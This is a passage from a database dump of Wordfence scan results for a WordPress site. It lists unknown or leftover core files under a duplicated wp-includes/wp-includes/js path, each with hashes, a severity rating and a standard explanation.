tab)</span></a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/media-audiovideo.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77753,1675048849,1675048849,'new','knownfile',75,'d2eae43143df05ae889b22e8927799cf','1f20ba3d1414b50eed9465afb3caa0f4','Unknown file in WordPress core: wp-includes/wp-includes/js/media-editor.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/media-editor.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77754,1675048849,1675048849,'new','knownfile',75,'fd1a119ca4a02bc0911f9e8ead142d40','37531bde7d1065bd91ea58c3a319184d','Unknown file in WordPress core: wp-includes/wp-includes/js/media-editor.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/media-editor.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77755,1675048849,1675048849,'new','knownfile',75,'b2cff32723099ccda1eeada609bae8de','23f9138fa826ce4c6ca63bb9d126fdb2','Unknown file in WordPress core: wp-includes/wp-includes/js/media-grid.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:40:\"wp-includes/wp-includes/js/media-grid.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77756,1675048849,1675048849,'new','knownfile',75,'bce07baae428ee52d6f329aa2cf28acd','675406f131ff47d6e55d51d40125a1cd','Unknown file in WordPress core: wp-includes/wp-includes/js/media-grid.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/js/media-grid.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77757,1675048849,1675048849,'new','knownfile',75,'e2f5479a1887995d3c6ad09a7db98b74','1bc2ccb153c594fe6280ddaeb977fa7a','Unknown file in WordPress core: wp-includes/wp-includes/js/media-models.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/media-models.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77758,1675048849,1675048849,'new','knownfile',75,'be3ae3cb8a3ace9d1e319f925d7971d8','30c780f683cf961d33bde412255c86f9','Unknown file in WordPress core: wp-includes/wp-includes/js/media-models.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/media-models.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77759,1675048849,1675048849,'new','knownfile',75,'54b1d58e44c165b727876cfd094829e1','c14bbe6e7cd4ceafd79e8f93c09c9f4d','Unknown file in WordPress core: wp-includes/wp-includes/js/media-views.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/js/media-views.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77760,1675048849,1675048849,'new','knownfile',75,'f3ed63cfac675e609fa09a82eef0faac','5a6f48c29dd1693233e79fcb7a810419','Unknown file in WordPress core: wp-includes/wp-includes/js/media-views.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/js/media-views.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77761,1675048849,1675048849,'new','knownfile',75,'e90f3a4755a7dbb9508879ee98d17584','5e98185b784f1df386fd37049dac6b5b','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/mediaelement-and-player.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/js/mediaelement/mediaelement-and-player.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77762,1675048849,1675048849,'new','knownfile',75,'9b93526f46643ffd053a8b3feb7dc7f6','31575184a43959adc21e576b733440cd','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/mediaelement-and-player.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:70:\"wp-includes/wp-includes/js/mediaelement/mediaelement-and-player.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77763,1675048849,1675048849,'new','knownfile',75,'5b42333a75cfd19e71766a64d9c3e3f9','6fd765d422ad77873161e2db1525aee6','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/mediaelement-migrate.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/js/mediaelement/mediaelement-migrate.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77764,1675048849,1675048849,'new','knownfile',75,'5a72f8e1014104227b8f2ebae3d8a0a4','a5d5f4c90a51a19083415404be3a0f09','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/mediaelement-migrate.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:67:\"wp-includes/wp-includes/js/mediaelement/mediaelement-migrate.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77765,1675048849,1675048849,'new','knownfile',75,'d0e23e4ed180138f9957872d42753445','2fe5f2f861770a9c11889c78fe4969d1','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/mediaelement.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/js/mediaelement/mediaelement.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77766,1675048849,1675048849,'new','knownfile',75,'a366363cecfc6df8fa6fb71395a79669','35e21a275d28760b988bd9b06bb6287d','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/mediaelement.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/js/mediaelement/mediaelement.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77767,1675048849,1675048849,'new','knownfile',75,'8dda0ab0db1e3771eadb5f1a937bd95d','035d6774ab81569269bf82a4ff8a5fab','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/mediaelementplayer-legacy.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:69:\"wp-includes/wp-includes/js/mediaelement/mediaelementplayer-legacy.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77768,1675048849,1675048849,'new','knownfile',75,'9d66fafab96483da117ee59317e803f8','e416d0d508ebb0485ead142e7f2b472e','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:73:\"wp-includes/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77769,1675048850,1675048850,'new','knownfile',75,'f1c2182329f7dccbd40653632b845d9c','1134eb4f1bf20def37ebc84e75ae964a','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/mediaelementplayer.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/js/mediaelement/mediaelementplayer.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77770,1675048850,1675048850,'new','knownfile',75,'31f2a9cd7a6ec279f3445e8bf74392d8','549a92b501573dc01ad7094a1a9413fa','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/mediaelementplayer.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/js/mediaelement/mediaelementplayer.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77771,1675048850,1675048850,'new','knownfile',75,'6b7ca2f297d31fc7abc622a1fee3b8f0','fe3a53badfa21857d9d99ce71a78bb44','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/mejs-controls.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/js/mediaelement/mejs-controls.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77772,1675048850,1675048850,'new','knownfile',75,'680dea47556d8b67db0ad3bd79ed6b32','afac53d8ccf83aeff4186dca42b8f776','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/mejs-controls.svg','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/js/mediaelement/mejs-controls.svg\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77773,1675048850,1675048850,'new','knownfile',75,'0cea071d0abf03f9ac8c5f2ab738145c','c7a3291a76d0d84cdca728dc16a01c8c','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/renderers/vimeo.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/js/mediaelement/renderers/vimeo.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77774,1675048850,1675048850,'new','knownfile',75,'d49b2d2426a582d75258a3ed3ac05794','c037417ab64a37ad47fd418bf7ddcabb','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/renderers/vimeo.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/js/mediaelement/renderers/vimeo.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77775,1675048850,1675048850,'new','knownfile',75,'cb92c7bf6980abc4e11ec719213df427','0034e60d16e44233b712b37865a0de35','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/wp-mediaelement.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/js/mediaelement/wp-mediaelement.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77776,1675048850,1675048850,'new','knownfile',75,'38098a2db6318291df5c759f8e15ed65','7bc0965430ab87f79cdf8f9585353fac','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/wp-mediaelement.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/js/mediaelement/wp-mediaelement.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77777,1675048850,1675048850,'new','knownfile',75,'337b90a994e3b1d6cfb76d3605bef131','3653900454d4a03e8338168a9464f718','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/wp-mediaelement.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/js/mediaelement/wp-mediaelement.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77778,1675048850,1675048850,'new','knownfile',75,'0c076f597d62d5ef8afce8f6578149b9','31e8953ba0a4d5417be3d09bf08bfea5','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/wp-mediaelement.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/js/mediaelement/wp-mediaelement.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77779,1675048850,1675048850,'new','knownfile',75,'89f41bd9e30cd991d812ff8f6bccb293','02c4709dd7d719692c3e1f16bf940405','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/wp-playlist.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/js/mediaelement/wp-playlist.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77780,1675048850,1675048850,'new','knownfile',75,'1c332bfa2970b2c6e4db80e6d4f5cab9','e9f13126afcfd15edc33b9aaeb601d3e','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/wp-playlist.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/js/mediaelement/wp-playlist.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77781,1675048850,1675048850,'new','knownfile',75,'32e513716150d9f01c42d3ba97d6046d','1c10779a561f95cf591becbf8b9a332f','Unknown file in WordPress core: wp-includes/wp-includes/js/plupload/handlers.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/js/plupload/handlers.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77782,1675048850,1675048850,'new','knownfile',75,'ab6dc14c3914c0bde75ca706cb07bb1a','a7cdae0e31ef40b1fead727d0e4d9e0a','Unknown file in WordPress core: wp-includes/wp-includes/js/plupload/handlers.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/plupload/handlers.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77783,1675048850,1675048850,'new','knownfile',25,'79e601677db28e9b5d527b445cf28505','6330b5e478c2de5babcf69b0109a212c','Old WordPress core file not removed during update: wp-includes/wp-includes/js/plupload/license.txt','This file is in a WordPress core location but is from an older version of WordPress and not used with your current version. Hosting or permissions issues can cause these files to get left behind when WordPress is updated and they should be removed if possible.','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/js/plupload/license.txt\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77784,1675048850,1675048850,'new','knownfile',75,'0d4d3c5fd03ae0c5bc575dba4b7a2639','8fbfb580fc10e46aea1552f7344c572c','Unknown file in WordPress core: wp-includes/wp-includes/js/plupload/moxie.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/js/plupload/moxie.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77785,1675048850,1675048850,'new','knownfile',75,'843d4cf4df0e5679d2fed43e58a80b9b','d9cc552667c958119248d8cde9435c5d','Unknown file in WordPress core: wp-includes/wp-includes/js/plupload/moxie.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/plupload/moxie.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77786,1675048851,1675048851,'new','knownfile',75,'4a677b1bc2949296065a610a7eb5764b','5bbc993176c93348854d7fcfe92bde7f','Unknown file in WordPress core: wp-includes/wp-includes/js/plupload/plupload.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/js/plupload/plupload.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77787,1675048851,1675048851,'new','knownfile',75,'28e82bea2a7909152e963d6190cce682','80bc77ef8692cabcda4c9b79ff9a2fb3','Unknown file in WordPress core: wp-includes/wp-includes/js/plupload/plupload.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/plupload/plupload.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77788,1675048851,1675048851,'new','knownfile',75,'02424a6375801a6f7ac145e8ba43ddbd','2c75606bbf5802230f0920734fb8bdf4','Unknown file in WordPress core: wp-includes/wp-includes/js/plupload/wp-plupload.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/plupload/wp-plupload.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77789,1675048851,1675048851,'new','knownfile',75,'5ab59ac7399512c2fbba5f882a133c9b','f076d7b646f620b0117f769d4b250b14','Unknown file in WordPress core: wp-includes/wp-includes/js/plupload/wp-plupload.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new 